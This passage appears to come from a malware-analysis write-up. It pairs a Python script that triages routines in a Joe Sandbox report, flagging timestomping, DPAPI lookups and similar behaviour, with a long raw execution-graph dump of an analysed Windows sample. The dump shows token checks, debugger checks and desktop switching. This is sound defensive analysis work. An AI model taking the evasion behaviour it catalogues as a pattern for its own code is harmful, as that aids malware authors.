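SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Constructed sample: three entries copied from this report section, Memory Dump Source trimmed.
SAMPLE = r"""
APIs
• __EH_prolog.LIBCMT ref: 0015761E
• SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00157799
  • Part of subcall function 0015A0C3: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00159EF9,?,?,?,00159D92,?,00000001,00000000,?,?), ref: 0015A0D7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
Similarity
• API ID: File$Attributes$H_prologTime
• String ID: :
• Opcode ID: dc9a8ff5502efd46a0413df2f95409081d3b840e10fd366e8e889bb9db479140
• Instruction Fuzzy Hash: F641E771804658EAEB24EB60EC46EEE737CEF54341F004099B965AB082DB705F8DCF61
Strings
Similarity
• API ID:
• String ID: UNC$\\?\
• Opcode ID: de69de3c164524f04a2f34535d84d3858466b03b073f352d52e78860133c27e9
• Instruction Fuzzy Hash: 77419231408219EBCB61AF21CC81AEE7769FF14352F108126FCB4AA141F774DA9D8AA0
APIs
  • Part of subcall function 0015DEB5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0015DED4
  • Part of subcall function 0015DEB5: GetProcAddress.KERNEL32(00191E58,CryptUnprotectMemory), ref: 0015DEE4
• GetCurrentProcessId.KERNEL32(?,?,?,0015DF2E), ref: 0015DFB5
Strings
• CryptUnprotectMemory failed, xrefs: 0015DFAD
• CryptProtectMemory failed, xrefs: 0015DF75
Similarity
• API ID: AddressProc$CurrentProcess
• String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
• Opcode ID: b78cc94851f40a9c3a6101da8aeb7e93b24a7863111b1c05dd86a68338f2dfed
• Instruction Fuzzy Hash: 44113171708116EBEB26A729EC01E6A7359AFD4751B05401BFC23DF191DB70DD4A87D0
"""


def parse_entries(report_text):
    """Split the text export into one record per routine; the Instruction Fuzzy Hash closes an entry."""
    entries, section, cur = [], None, None
    for raw in report_text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            if cur is None:
                cur = {"apis": [], "strings": [], "similarity": {}}
            continue
        if not line.startswith("•") or cur is None:
            continue
        item = line.lstrip("•").strip()
        if section == "APIs":
            m = API_LINE.match(item)
            if m:
                cur["apis"].append({"subcall_of": m.group(1), "name": m.group(2), "module": m.group(3),
                                    "args": m.group(4) or "", "ref": m.group(5)})
        elif section == "Strings":
            m = STRING_LINE.match(item)
            if m:
                cur["strings"].append(m.group(1))
        elif section == "Similarity":
            key, _, value = item.partition(":")
            cur["similarity"][key.strip()] = value.strip()
            if key.strip() == "Instruction Fuzzy Hash":
                entries.append(cur)
                cur = None
    return entries


def api_names(entry):
    return {a["name"] for a in entry["apis"]}


def triage(entry):
    """Editor's heuristics for one routine; these are not Joe Sandbox signatures."""
    names = api_names(entry)
    texts = " ".join(entry["strings"]) + " " + entry["similarity"].get("String ID", "")
    flags = []
    if {"SetFileTime", "SetFileAttributesW"} <= names:
        flags.append("rewrites file timestamps and attributes (timestomping candidate)")
    if any(a["name"] == "GetProcAddress" and "Crypt" in a["args"] for a in entry["apis"]):
        flags.append("resolves DPAPI memory-protection functions at runtime")
    if "Shell.Explorer" in texts:
        flags.append("instantiates an embedded WebBrowser (Shell.Explorer) control")
    if "\\\\?\\" in texts:
        flags.append("builds Win32 extended-length paths")
    return flags


def flagged(entries):
    """(short Opcode ID, flags) for every entry that trips at least one heuristic."""
    out = []
    for e in entries:
        f = triage(e)
        if f:
            out.append((e["similarity"].get("Opcode ID", "")[:12], f))
    return out


if __name__ == "__main__":
    for opcode_id, flags in flagged(parse_entries(SAMPLE)):
        print(opcode_id, "->", "; ".join(flags))
```

Run it over a full text export of the report to get a short list of routines worth opening in the disassembly; the Opcode ID and fuzzy hashes it keeps per record are what you would pivot on to find the same routine in other samples.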

                                                                                    Execution Graph

                                                                                    Execution Coverage: 6.2%
                                                                                    Dynamic/Decrypted Code Coverage: 0%
                                                                                    Signature Coverage: 15%
                                                                                    Total number of Nodes: 2000
                                                                                    Total number of Limit Nodes: 101
execution_graph
[Interactive call-graph rendering. The serialized node/edge data behind it is not readable as text and is summarized here. Root function: 11108d30.]
Windows API calls named in the graph nodes: OpenEventA, GetStockObject, GetObjectA, InitializeCriticalSection, CloseHandle, GetSystemDirectoryA, LoadLibraryA, LoadLibraryExA, GetProcAddress, FreeLibrary, GetModuleHandleW, CreateEventA, CreateThread, SetEvent, PulseEvent, WaitForSingleObject, WaitForMultipleObjects, Sleep, GetTickCount, InterlockedIncrement, InterlockedDecrement, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, GetCurrentProcess, GetCurrentThreadId, OpenProcessToken, GetTokenInformation, AllocateAndInitializeSid, EqualSid, GetVersionExA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, IsDebuggerPresent, OutputDebugStringA, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RaiseException, TerminateProcess, ExitProcess, ExitWindowsEx, RtlAllocateHeap, DecodePointer, TlsGetValue, TlsSetValue, GetLastError, SetLastError, GetThreadDesktop, OpenDesktopA, SetThreadDesktop, CloseDesktop, GetDesktopWindow, UnhookWindowsHookEx, GlobalAddAtomA, RegisterClassA, CreateWindowExA, FindWindowA, GetWindowThreadProcessId, OpenProcess, SendMessageA, PostMessageA, PostThreadMessageA, GetSystemMetrics, LoadIconA, LoadImageA, wsprintfA, wvsprintfA, IsDBCSLeadByte, GetLocaleInfoA, GetLocaleInfoW, InternetOpenA, InternetConnectA, CoInitialize, CoCreateInstance, CoUninitialize, SHGetSettings, SHGetFolderPathA, GetModuleFileNameA, GetFileAttributesA, GetExitCodeProcess, SetPriorityClass, CreateFileA, CreateDirectoryA, FindFirstFileA, FindNextFileA, FindClose.
Call sequences visible in the graph: GetCurrentProcess -> OpenProcessToken -> GetTokenInformation -> AllocateAndInitializeSid -> EqualSid (token SID comparison, function 1109e9e0/1109e910); LoadLibraryA -> GetProcAddress -> InternetOpenA / InternetConnectA (WinINet resolved at run time, function 11029590); GetThreadDesktop -> OpenDesktopA -> SetThreadDesktop -> CloseDesktop (desktop switching, function 11102c50); FindWindowA -> GetWindowThreadProcessId -> OpenProcess -> SendMessageA -> WaitForSingleObject (function 1102e640); IsDebuggerPresent and OutputDebugStringA debugger checks; ExitWindowsEx -> Sleep -> ExitProcess (function 1102d330).
__lock_file 59318->59320 59326 111644cc _fgets 59318->59326 59319 111644c1 59760 1116df04 11 API calls _strupr_s_l_stat 59319->59760 59322 11164506 59320->59322 59327 11164571 59320->59327 59761 11169287 59322->59761 59324 1116459e 59770 111645cd LeaveCriticalSection LeaveCriticalSection _fputs 59324->59770 59326->59209 59327->59324 59739 11171a25 59327->59739 59329 1116450c 59329->59327 59768 111692ef 67 API calls __getptd_noexit 59329->59768 59331 11164566 59769 1116df04 11 API calls _strupr_s_l_stat 59331->59769 59334 1116368f 59333->59334 59814 11163420 59334->59814 59363 11163dc3 _fgets 59362->59363 59364 11163dd5 59363->59364 59365 11163dea 59363->59365 59887 111692ef 67 API calls __getptd_noexit 59364->59887 59367 11163dfd __lock_file 59365->59367 59373 11163de5 _fgets 59365->59373 59871 11163d4a 59367->59871 59369 11163dda 59373->59211 59402 11163f31 59399->59402 59401 11163fff 59401->59311 59405 11163f3d _fgets 59402->59405 59403 11163f50 59458 111692ef 67 API calls __getptd_noexit 59403->59458 59405->59403 59407 11163f7d 59405->59407 59406 11163f55 59459 1116df04 11 API calls _strupr_s_l_stat 59406->59459 59421 111716f8 59407->59421 59410 11163f82 59418 11163f60 _fgets @_EH4_CallFilterFunc@8 59418->59401 59422 11171704 _fgets 59421->59422 59463 1117373c 59422->59463 59424 11171787 59470 11171822 59424->59470 59425 1117178e 59475 11169d79 59425->59475 59429 11171817 _fgets 59429->59410 59430 111717a3 InitializeCriticalSectionAndSpinCount 59432 111717d6 EnterCriticalSection 59430->59432 59433 111717c3 _free 59430->59433 59431 11171712 59431->59424 59431->59425 59473 1117367a 67 API calls 8 library calls 59431->59473 59474 1116b048 LeaveCriticalSection LeaveCriticalSection _doexit 59431->59474 59432->59424 59433->59424 59458->59406 59459->59418 59464 11173764 EnterCriticalSection 59463->59464 59465 11173751 59463->59465 59464->59431 59481 1117367a 67 API calls 8 library calls 59465->59481 59467 11173757 59467->59464 59482 1116d7aa 67 API calls 3 library 
calls 59467->59482 59483 11173663 LeaveCriticalSection 59470->59483 59472 11171829 59472->59429 59473->59431 59474->59431 59476 11169d82 59475->59476 59477 11162b51 _malloc 66 API calls 59476->59477 59478 11169db8 59476->59478 59479 11169d99 Sleep 59476->59479 59477->59476 59478->59424 59478->59430 59480 11169dae 59479->59480 59480->59476 59480->59478 59481->59467 59483->59472 59740 11171a32 59739->59740 59744 11171a47 59739->59744 59799 111692ef 67 API calls __getptd_noexit 59740->59799 59742 11171a37 59800 1116df04 11 API calls _strupr_s_l_stat 59742->59800 59743 11171a42 59743->59327 59744->59743 59746 11171a7c 59744->59746 59801 1117712e 67 API calls __malloc_crt 59744->59801 59748 11169287 _fgets 67 API calls 59746->59748 59749 11171a90 59748->59749 59771 111747ed 59749->59771 59759->59319 59760->59326 59762 11169293 59761->59762 59763 111692a8 59761->59763 59812 111692ef 67 API calls __getptd_noexit 59762->59812 59763->59329 59765 11169298 59813 1116df04 11 API calls _strupr_s_l_stat 59765->59813 59767 111692a3 59767->59329 59768->59331 59769->59327 59770->59326 59799->59742 59800->59743 59801->59746 59812->59765 59813->59767 59826 11163399 59814->59826 59816 11163444 59834 111692ef 67 API calls __getptd_noexit 59816->59834 59820 11163491 __isctype_l 59822 1116347a 59820->59822 59822->59820 59824 111634c1 59822->59824 59827 111633ac 59826->59827 59833 111633f9 59826->59833 59828 1116b7b5 __getptd 67 API calls 59827->59828 59829 111633b1 59828->59829 59833->59816 59833->59822 59887->59369 59933->58398 59935 11028613 59934->59935 59936 11028c5b 59934->59936 59937 110286d0 GetModuleFileNameA 59935->59937 59946 11028648 59935->59946 59939 11028cf7 59936->59939 59940 11028d0a 59936->59940 59938 110286f1 _strrchr 59937->59938 59944 11163fed std::locale::facet::_Facet_Register 251 API calls 59938->59944 59942 11161d01 _strupr_s_l_stat 5 API calls 59939->59942 59941 11161d01 _strupr_s_l_stat 5 API calls 59940->59941 59943 11028d1b 59941->59943 59945 11028d06 
59942->59945 59943->58416 59947 110286cb 59944->59947 59945->58416 59946->59946 59948 11163fed std::locale::facet::_Facet_Register 251 API calls 59946->59948 59947->59936 59962 11026890 82 API calls 2 library calls 59947->59962 59948->59947 59950 11163db7 std::locale::facet::_Facet_Register 219 API calls 59950->59936 59951 11028744 59959 11028bc5 59951->59959 59963 11026700 67 API calls 3 library calls 59951->59963 59953 11028780 59964 11026890 82 API calls 2 library calls 59953->59964 59959->59950 59959->59959 59962->59951 59963->59953 59968->58424 60869->58941 60870->58945 60871->58970 60922 110805f0 60872->60922 60877 1102d54a 60881 110eb080 60877->60881 60878 110affe7 60934 11029450 395 API calls 2 library calls 60878->60934 60882 110affa0 397 API calls 60881->60882 60883 110eb0ad 60882->60883 60950 110ea450 60883->60950 60885 110eb0f1 60960 110b0190 398 API calls std::locale::facet::_Facet_Register 60885->60960 60887 1102d555 60893 110b0190 398 API calls std::locale::facet::_Facet_Register 60887->60893 60888->58966 60889->58962 60890->58967 60891->58971 60892->58973 60893->58994 60894->59001 60895->58987 60896->58999 60898->59007 60899->59014 60900->58995 60902->59045 60903->59086 60904->59086 60905->59068 60906->59080 60908 1108a617 60907->60908 60912 1108a5aa std::ios_base::_Tidy 60907->60912 60909 1108a61e DeleteCriticalSection 60908->60909 60963 1106e1b0 60909->60963 60910 1108a5be CloseHandle 60910->60912 60912->60908 60912->60910 60913 1108a644 std::ios_base::_Tidy 60913->59070 60914->59074 60915->59074 60916->59089 60917->59010 60918->59021 60920->59088 60921->59036 60923 11080614 60922->60923 60924 11080618 60923->60924 60925 1108062f 60923->60925 60935 11029450 395 API calls 2 library calls 60924->60935 60927 11080648 60925->60927 60928 1108062c 60925->60928 60931 110aff90 60927->60931 60928->60925 60936 11029450 395 API calls 2 library calls 60928->60936 60937 110812d0 60931->60937 60938 110812f1 60937->60938 60940 1108131d 60937->60940 60939 
1108130b 60938->60939 60938->60940 60941 11161d01 _strupr_s_l_stat 5 API calls 60939->60941 60942 1108136a wsprintfA 60940->60942 60943 11081345 wsprintfA 60940->60943 60944 11081319 60941->60944 60949 11029450 395 API calls 2 library calls 60942->60949 60943->60940 60944->60877 60944->60878 60951 110ea45b 60950->60951 60952 110ea4f5 60951->60952 60953 110ea47e 60951->60953 60954 110ea495 60951->60954 60952->60885 60961 11029450 395 API calls 2 library calls 60953->60961 60956 110ea492 60954->60956 60957 110ea4c2 SendMessageTimeoutA 60954->60957 60956->60954 60962 11029450 395 API calls 2 library calls 60956->60962 60957->60952 60960->60887 60966 1106e1c4 60963->60966 60964 1106e1c8 60964->60913 60966->60964 60967 1106d9a0 69 API calls 2 library calls 60966->60967 60967->60966 60969 11134d10 60970 11134d48 60969->60970 60971 11134d19 60969->60971 60972 11145320 std::locale::facet::_Facet_Register 206 API calls 60971->60972 60973 11134d1e 60972->60973 60973->60970 60974 11132bf0 403 API calls 60973->60974 60975 11134d27 60974->60975 60975->60970 60976 1105dd10 191 API calls 60975->60976 60976->60970 60977 110310c0 60978 110310ce 60977->60978 60979 11145e80 395 API calls 60978->60979 60980 110310df SetUnhandledExceptionFilter 60979->60980 60981 110310ef std::locale::facet::_Facet_Register 60980->60981 60982 11040860 60983 11040892 60982->60983 60984 11040898 60983->60984 60991 110408b4 60983->60991 60985 110facc0 15 API calls 60984->60985 60987 110408aa CloseHandle 60985->60987 60986 110409c8 60988 11161d01 _strupr_s_l_stat 5 API calls 60986->60988 60987->60991 60990 110409d5 60988->60990 60989 11040948 61004 110facc0 GetTokenInformation 60989->61004 60991->60986 60994 110408ed 60991->60994 61014 11087ee0 427 API calls 4 library calls 60991->61014 60994->60986 60994->60989 60995 1104095a 60996 11040962 CloseHandle 60995->60996 61000 11040969 60995->61000 60996->61000 60997 110409ab 60998 11161d01 _strupr_s_l_stat 5 API calls 60997->60998 61001 110409c4 60998->61001 
60999 11040991 61002 11161d01 _strupr_s_l_stat 5 API calls 60999->61002 61000->60997 61000->60999 61003 110409a7 61002->61003 61005 110fad08 61004->61005 61006 110facf7 61004->61006 61015 110f1f50 9 API calls 61005->61015 61007 11161d01 _strupr_s_l_stat 5 API calls 61006->61007 61009 110fad04 61007->61009 61009->60995 61010 110fad2c 61010->61006 61011 110fad34 61010->61011 61012 11161d01 _strupr_s_l_stat 5 API calls 61011->61012 61013 110fad5a 61012->61013 61013->60995 61014->60994 61015->61010 61016 11089a40 61017 1110f6c0 ___DllMainCRTStartup 4 API calls 61016->61017 61018 11089a53 61017->61018 61019 11089a5d 61018->61019 61028 11089150 398 API calls std::locale::facet::_Facet_Register 61018->61028 61021 11089a84 61019->61021 61029 11089150 398 API calls std::locale::facet::_Facet_Register 61019->61029 61024 11089a93 61021->61024 61025 11089a10 61021->61025 61030 110896a0 61025->61030 61028->61019 61029->61021 61067 11088970 6 API calls ___DllMainCRTStartup 61030->61067 61032 110896d9 GetParent 61033 110896ec 61032->61033 61034 110896fd 61032->61034 61035 110896f0 GetParent 61033->61035 61036 11163fed std::locale::facet::_Facet_Register 251 API calls 61034->61036 61035->61034 61035->61035 61037 11089716 std::ios_base::_Tidy 61036->61037 61068 11013830 22 API calls 2 library calls 61037->61068 61039 1108974a 61039->61039 61040 11143230 std::locale::facet::_Facet_Register 8 API calls 61039->61040 61043 1108978a std::ios_base::_Tidy 61040->61043 61041 110897a5 61044 11163db7 std::locale::facet::_Facet_Register 219 API calls 61041->61044 61046 110897c3 61041->61046 61042 11089874 std::ios_base::_Tidy 61047 11161d01 _strupr_s_l_stat 5 API calls 61042->61047 61043->61041 61045 11142290 std::locale::facet::_Facet_Register 395 API calls 61043->61045 61044->61046 61045->61041 61046->61042 61048 1102a620 std::locale::facet::_Facet_Register 262 API calls 61046->61048 61049 11089962 61047->61049 61050 11089813 61048->61050 61049->61024 61051 11142290 
std::locale::facet::_Facet_Register 395 API calls 61050->61051 61052 1108981b 61051->61052 61053 11081b40 std::locale::facet::_Facet_Register IsDBCSLeadByte 61052->61053 61054 11089832 61053->61054 61054->61042 61055 11081bb0 200 API calls 61054->61055 61056 1108984a 61055->61056 61057 1108988e 61056->61057 61058 11089851 61056->61058 61060 11081bb0 200 API calls 61057->61060 61069 110b75d0 61058->61069 61062 11089899 61060->61062 61062->61042 61064 110b75d0 69 API calls 61062->61064 61063 110b75d0 69 API calls 61063->61042 61065 110898a6 61064->61065 61065->61042 61066 110b75d0 69 API calls 61065->61066 61066->61042 61067->61032 61068->61039 61072 110b75b0 61069->61072 61075 111672e3 61072->61075 61078 11167264 61075->61078 61079 11167271 61078->61079 61080 1116728b 61078->61080 61096 11169302 67 API calls __getptd_noexit 61079->61096 61080->61079 61082 11167294 GetFileAttributesA 61080->61082 61084 111672a2 GetLastError 61082->61084 61085 111672b8 61082->61085 61083 11167276 61097 111692ef 67 API calls __getptd_noexit 61083->61097 61099 11169315 67 API calls 3 library calls 61084->61099 61092 11089857 61085->61092 61101 11169302 67 API calls __getptd_noexit 61085->61101 61088 1116727d 61098 1116df04 11 API calls _strupr_s_l_stat 61088->61098 61092->61042 61092->61063 61093 111672cb 61102 111692ef 67 API calls __getptd_noexit 61093->61102 61095 111672ae 61100 111692ef 67 API calls __getptd_noexit 61095->61100 61096->61083 61097->61088 61098->61092 61099->61095 61100->61092 61101->61093 61102->61095 61103 2d1020 GetCommandLineA 61105 2d1035 GetStartupInfoA 61103->61105 61106 2d108b 61105->61106 61107 2d1090 GetModuleHandleA 61105->61107 61106->61107 61110 2d1000 _NSMClient32 61107->61110 61109 2d10a2 ExitProcess 61110->61109 61111 111071e0 61112 111071ec 61111->61112 61113 1110720f 61112->61113 61114 111450a0 std::locale::facet::_Facet_Register 206 API calls 61112->61114 61119 11107218 61113->61119 61157 11106100 GetTickCount EnterCriticalSection GetTickCount 
61113->61157 61117 11107201 61114->61117 61116 11107223 61117->61113 61120 111062e0 61117->61120 61190 11163180 61120->61190 61122 111062fb LoadLibraryA 61201 11137340 406 API calls 2 library calls 61122->61201 61124 11106361 61125 11106365 61124->61125 61126 1110637d 61124->61126 61125->61126 61127 1110636a 61125->61127 61128 111450a0 std::locale::facet::_Facet_Register 206 API calls 61126->61128 61129 11106375 61127->61129 61130 1110636e FreeLibrary 61127->61130 61131 11106386 61128->61131 61135 11161d01 _strupr_s_l_stat 5 API calls 61129->61135 61130->61129 61132 111063a1 LoadLibraryA GetProcAddress 61131->61132 61133 11106397 61131->61133 61134 111064d1 SetLastError 61132->61134 61139 11106443 61132->61139 61133->61132 61144 1110660f 61134->61144 61136 11106665 61135->61136 61136->61113 61137 111450a0 std::locale::facet::_Facet_Register 206 API calls 61138 11106624 61137->61138 61140 11106635 FreeLibrary 61138->61140 61141 1110663c 61138->61141 61143 111064f2 OpenProcess 61139->61143 61139->61144 61155 11106497 61139->61155 61191 11025d00 61139->61191 61140->61141 61141->61129 61142 11106640 FreeLibrary 61141->61142 61142->61129 61143->61139 61143->61155 61144->61137 61145 111064a5 GetProcAddress 61147 111064de SetLastError 61145->61147 61145->61155 61147->61155 61148 111065e5 CloseHandle 61148->61144 61148->61155 61149 11081b40 std::locale::facet::_Facet_Register IsDBCSLeadByte 61149->61155 61150 11081bb0 200 API calls 61150->61155 61151 11106556 OpenProcessToken 61151->61148 61151->61155 61152 11106574 GetTokenInformation 61153 111065d8 CloseHandle 61152->61153 61152->61155 61153->61148 61154 11106100 408 API calls 61154->61155 61155->61139 61155->61143 61155->61144 61155->61145 61155->61148 61155->61149 61155->61150 61155->61151 61155->61152 61155->61153 61155->61154 61202 110f5e90 25 API calls std::locale::facet::_Facet_Register 61155->61202 61158 11106153 61157->61158 61159 11106148 61157->61159 61161 11106172 61158->61161 61162 111061ca GetTickCount 
LeaveCriticalSection 61158->61162 61160 11146450 std::locale::facet::_Facet_Register 21 API calls 61159->61160 61160->61158 61163 11106190 GetTickCount LeaveCriticalSection 61161->61163 61203 11029450 395 API calls 2 library calls 61161->61203 61164 111061f0 EnterCriticalSection 61162->61164 61165 111061e2 61162->61165 61167 111061b3 61163->61167 61168 111061a8 61163->61168 61170 11106219 61164->61170 61169 11146450 std::locale::facet::_Facet_Register 21 API calls 61165->61169 61167->61116 61172 11146450 std::locale::facet::_Facet_Register 21 API calls 61168->61172 61173 111061ed 61169->61173 61174 11106223 61170->61174 61175 11106244 61170->61175 61172->61167 61173->61164 61176 111062be LeaveCriticalSection 61174->61176 61177 1110622e 61174->61177 61178 1110f420 std::locale::facet::_Facet_Register 395 API calls 61175->61178 61176->61116 61204 11029450 395 API calls 2 library calls 61177->61204 61182 1110624e 61178->61182 61181 111062bb 61181->61176 61183 11106274 61182->61183 61184 1110628b 61182->61184 61205 11029450 395 API calls 2 library calls 61183->61205 61206 110ebfb0 399 API calls 4 library calls 61184->61206 61187 111062a0 61189 11146450 std::locale::facet::_Facet_Register 21 API calls 61187->61189 61189->61181 61190->61122 61192 11025d0e GetProcAddress 61191->61192 61193 11025d1f 61191->61193 61192->61193 61194 11025d38 61193->61194 61195 11025d2c K32GetProcessImageFileNameA 61193->61195 61197 11025d3e GetProcAddress 61194->61197 61198 11025d4f 61194->61198 61195->61194 61196 11025d71 61195->61196 61196->61155 61197->61198 61199 11025d56 61198->61199 61200 11025d67 SetLastError 61198->61200 61199->61155 61200->61196 61201->61124 61202->61155 61206->61187 61207 110173f0 GetTickCount 61214 11017300 61207->61214 61212 11146450 std::locale::facet::_Facet_Register 21 API calls 61213 11017437 61212->61213 61215 11017320 61214->61215 61216 110173d6 61214->61216 61217 11017342 CoInitialize _GetRawWMIStringW 61215->61217 61219 11017339 WaitForSingleObject 
61215->61219 61218 11161d01 _strupr_s_l_stat 5 API calls 61216->61218 61220 11017375 61217->61220 61223 110173c2 61217->61223 61221 110173e5 61218->61221 61219->61217 61220->61223 61224 110173bc 61220->61224 61226 11163a2d std::locale::facet::_Facet_Register 191 API calls 61220->61226 61227 11017220 61221->61227 61222 110173d0 CoUninitialize 61222->61216 61223->61216 61223->61222 61240 11163837 __fassign 61224->61240 61226->61220 61228 11017240 61227->61228 61229 110172e6 61227->61229 61230 11017258 CoInitialize _GetRawWMIStringW 61228->61230 61232 1101724f WaitForSingleObject 61228->61232 61231 11161d01 _strupr_s_l_stat 5 API calls 61229->61231 61233 110172d2 61230->61233 61236 1101728b 61230->61236 61234 110172f5 SetEvent GetTickCount 61231->61234 61232->61230 61233->61229 61235 110172e0 CoUninitialize 61233->61235 61234->61212 61235->61229 61236->61233 61237 110172cc 61236->61237 61239 11163a2d std::locale::facet::_Facet_Register 191 API calls 61236->61239 61241 11163837 __fassign 61237->61241 61239->61236 61240->61223 61241->61233 61242 11025cd0 LoadLibraryA 61243 1113cd60 61244 1113cd69 61243->61244 61245 1113cd6e 61243->61245 61247 11139090 61244->61247 61248 111390d2 61247->61248 61249 111390c7 GetCurrentThreadId 61247->61249 61250 111390e0 61248->61250 61374 11029330 61248->61374 61249->61248 61381 11133920 61250->61381 61256 111391d1 61259 11139202 FindWindowA 61256->61259 61265 1113929a 61256->61265 61257 11161d01 _strupr_s_l_stat 5 API calls 61260 11139772 61257->61260 61262 11139217 IsWindowVisible 61259->61262 61259->61265 61260->61245 61261 1113911c IsWindow IsWindowVisible 61263 11146450 std::locale::facet::_Facet_Register 21 API calls 61261->61263 61262->61265 61267 1113921e 61262->61267 61264 11139147 61263->61264 61266 1105dd10 191 API calls 61264->61266 61268 1105dd10 191 API calls 61265->61268 61269 111392bf 61265->61269 61270 11139163 IsWindowVisible 61266->61270 61267->61265 61272 11138c30 474 API calls 61267->61272 61286 111392e7 61268->61286 
61273 1105dd10 191 API calls 61269->61273 61278 1113945f 61269->61278 61270->61256 61274 11139171 61270->61274 61271 1113948a 61277 111394a7 61271->61277 61610 1106b860 411 API calls 61271->61610 61276 1113923f IsWindowVisible 61272->61276 61273->61278 61274->61256 61279 11139179 61274->61279 61275 11138c30 474 API calls 61275->61271 61276->61265 61280 1113924e IsIconic 61276->61280 61288 111394b4 61277->61288 61289 111394bd 61277->61289 61278->61271 61278->61275 61282 11146450 std::locale::facet::_Facet_Register 21 API calls 61279->61282 61280->61265 61283 1113925f GetForegroundWindow 61280->61283 61284 11139183 GetForegroundWindow 61282->61284 61608 11131210 264 API calls 61283->61608 61293 11139192 EnableWindow 61284->61293 61294 111391be 61284->61294 61286->61269 61287 11139334 61286->61287 61296 11081a70 IsDBCSLeadByte 61286->61296 61290 11143230 std::locale::facet::_Facet_Register 8 API calls 61287->61290 61611 11131b00 202 API calls 2 library calls 61288->61611 61291 111394d4 61289->61291 61292 111394c8 61289->61292 61299 11139346 61290->61299 61613 111317a0 413 API calls std::locale::facet::_Facet_Register 61291->61613 61300 111394d9 61292->61300 61301 111394cd 61292->61301 61606 11131210 264 API calls 61293->61606 61294->61256 61309 111391ca SetForegroundWindow 61294->61309 61295 1113926e 61609 11131210 264 API calls 61295->61609 61296->61287 61298 111394ba 61298->61289 61305 11139353 GetLastError 61299->61305 61324 11139361 61299->61324 61307 11139599 61300->61307 61313 111394f1 61300->61313 61314 1113959b 61300->61314 61612 11131870 413 API calls std::locale::facet::_Facet_Register 61301->61612 61311 11146450 std::locale::facet::_Facet_Register 21 API calls 61305->61311 61316 111386b0 438 API calls 61307->61316 61308 111391a9 61607 11131210 264 API calls 61308->61607 61309->61256 61310 11139275 61317 1113928b EnableWindow 61310->61317 61318 11139284 SetForegroundWindow 61310->61318 61311->61324 61312 111394d2 61312->61300 61313->61307 61326 1110f420 
std::locale::facet::_Facet_Register 395 API calls 61313->61326 61314->61307 61619 1103f000 70 API calls 61314->61619 61332 111395ee 61316->61332 61317->61265 61318->61317 61319 111391b0 EnableWindow 61319->61294 61320 11139615 61323 1113974a 61320->61323 61334 1105dd10 191 API calls 61320->61334 61322 111395aa 61620 1103f040 70 API calls 61322->61620 61323->61257 61324->61269 61325 111393b2 61324->61325 61329 11081a70 IsDBCSLeadByte 61324->61329 61327 11143230 std::locale::facet::_Facet_Register 8 API calls 61325->61327 61330 11139512 61326->61330 61331 111393c4 61327->61331 61329->61325 61335 11139544 61330->61335 61336 11139524 61330->61336 61331->61269 61338 111393cb GetLastError 61331->61338 61332->61320 61524 11142210 61332->61524 61333 111395b5 61621 1103f060 70 API calls 61333->61621 61341 11139645 61334->61341 61615 1110f260 InterlockedIncrement 61335->61615 61614 110573b0 411 API calls std::locale::facet::_Facet_Register 61336->61614 61343 11146450 std::locale::facet::_Facet_Register 21 API calls 61338->61343 61341->61323 61350 11139662 61341->61350 61351 1113968d 61341->61351 61342 11139533 61342->61335 61343->61269 61345 111395c0 61622 1103f020 70 API calls 61345->61622 61346 11139558 61616 1104e340 403 API calls 61346->61616 61348 111395cb 61623 1110f270 InterlockedDecrement 61348->61623 61352 11139699 GetTickCount 61350->61352 61354 1113966a 61350->61354 61351->61323 61351->61352 61352->61323 61355 111396ab 61352->61355 61357 11146450 std::locale::facet::_Facet_Register 21 API calls 61354->61357 61359 11142e80 262 API calls 61355->61359 61356 1113956e 61617 1104e3b0 403 API calls 61356->61617 61358 11139675 GetTickCount 61357->61358 61358->61323 61361 111396b7 61359->61361 61362 11146ee0 397 API calls 61361->61362 61363 111396c2 61362->61363 61364 11142e80 262 API calls 61363->61364 61366 111396d5 61364->61366 61365 11139579 61365->61307 61618 110ebf30 419 API calls 61365->61618 61624 11025bb0 LoadLibraryA 61366->61624 61369 111396e2 61369->61369 61625 
1112c7a0 GetProcAddress SetLastError 61369->61625 61371 11139729 61372 11139733 FreeLibrary 61371->61372 61373 1113973a std::ios_base::_Tidy 61371->61373 61372->61373 61373->61323 61626 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 61374->61626 61376 1102933e 61377 11029353 61376->61377 61627 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 61376->61627 61628 11089cc0 399 API calls 2 library calls 61377->61628 61380 1102935e 61380->61250 61382 11133962 61381->61382 61383 11133c84 61381->61383 61385 1105dd10 191 API calls 61382->61385 61384 11161d01 _strupr_s_l_stat 5 API calls 61383->61384 61386 11133c9c 61384->61386 61387 11133982 61385->61387 61429 11133400 61386->61429 61387->61383 61388 1113398a GetLocalTime 61387->61388 61389 111339c1 LoadLibraryA 61388->61389 61390 111339a0 61388->61390 61629 110098c0 LoadLibraryA 61389->61629 61391 11146450 std::locale::facet::_Facet_Register 21 API calls 61390->61391 61394 111339b5 61391->61394 61393 11133a15 61630 11015c30 LoadLibraryA 61393->61630 61394->61389 61396 11133a20 GetCurrentProcess 61397 11133a45 GetProcAddress 61396->61397 61398 11133a5d GetProcessHandleCount 61396->61398 61397->61398 61399 11133a66 SetLastError 61397->61399 61400 11133a6e 61398->61400 61399->61400 61401 11133a78 GetProcAddress 61400->61401 61404 11133a92 61400->61404 61402 11133ac7 SetLastError 61401->61402 61401->61404 61403 11133aa0 GetProcAddress 61402->61403 61405 11133aba 61403->61405 61406 11133ad4 SetLastError 61403->61406 61404->61403 61404->61405 61407 11133adf GetProcAddress 61405->61407 61406->61407 61408 11133af1 K32GetProcessMemoryInfo 61407->61408 61409 11133aff SetLastError 61407->61409 61410 11133b07 61408->61410 61409->61410 61411 11146450 std::locale::facet::_Facet_Register 21 API calls 61410->61411 61413 11133b7d 61410->61413 61411->61413 61412 11133c5a 61414 11133c6a FreeLibrary 61412->61414 